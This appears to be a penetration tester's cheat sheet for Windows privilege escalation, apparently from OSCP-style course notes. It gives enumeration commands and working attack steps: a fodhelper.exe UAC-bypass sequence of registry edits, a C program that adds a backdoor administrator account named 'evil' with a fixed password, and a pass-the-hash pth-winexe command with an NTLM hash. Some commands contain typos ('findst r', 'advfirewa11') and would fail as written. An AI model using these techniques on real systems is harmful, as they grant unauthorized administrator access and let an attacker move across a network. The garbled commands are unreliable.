- Automated enumeration scripts
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe
// https://github.com/pentestmonkey/windows-privesc-check
windows-privesc-check2.exe --dump -a -o report.txt
- Check hidden files
Get-ChildItem -Path . -Recurse -Force
dir /S /a
- Enumerating Users
whoami
whoami /all #groups, permissions, etc
whoami /groups # check cmd integrity level
net user
net user /domain # AD users
net user <username>
net user jeff_admin /domain # AD user jeff_admin
echo %username%
net accounts # domain's account policy
- Get System information
systeminfo | findst r /B /C: "OS Name" /C:"OS Version" /C:"System Type"
hostname
- Enumerating Running Processes and Services
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
tasklist /SVC
- Enumerating Networking Information
ipconfig /all
route print
netstat -ano
- Enumerating Firewall Status and Rules
netsh advfirewa11 show currentprofile
netsh advfirewall firewall show rule name=all
- Enumerating Scheduled Tasks
schtasks /query /fo LIST /v
- Enumerating Installed Applications and Patch Levels
// Does not list applications that do not use the Windows Installer
wmic product get name, version, vendor
wmic qfe get Caption, Description, HotFixID, InstaltedOn
- Enumerating Readable/Writable Files and Directories
accesschk.exe -uws "Everyone" "C:\Program Files"
// powershell cmdlet
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
- Enumerating Unmounted Disks
mountvol
- Enumerating Device Drivers
// list drivers, use powershell to filter output
driverquery.exe / v / fo csv | Convertfrom-CSV | Select-Object 'Display Name', ' Start Mode', 'Path'
// Get driver version and other details
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}
- Enumerating Binaries That AutoElevate
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
// If any of this key is enabled (set to 1), we could craft an MSI file and run it to elevate our privileges.
- Elevating Medium to High integrity shell using fodhelper.exe (admin required)
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
C:\Windows\System32\fodhelper.exe
- Checking file permissions
icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
- C program to create admin user - compile with gcc to create exeutable
#include <stdlib.h>
int main ()
{
int i;
i = system ( "net user evil Ev!lpass /add") ;
i = system ("net localgroup administrators evil /add");
return 0;
}
- Pass-The-Hash attacks(requires SMB + NTLM)
Existing tools - PsExec from Metasploit, Passing-the-hash toolkit, and Impacket
// https://github.com/byt3bl33d3r/pth-toolkit
kali@kali:~$ pth-winexe -U offsec%aad3b435b51484eeaad3b435b51484ee:2892d26cdf84d7a78e2eb3b9f05c425e //10.11.0.22 cmd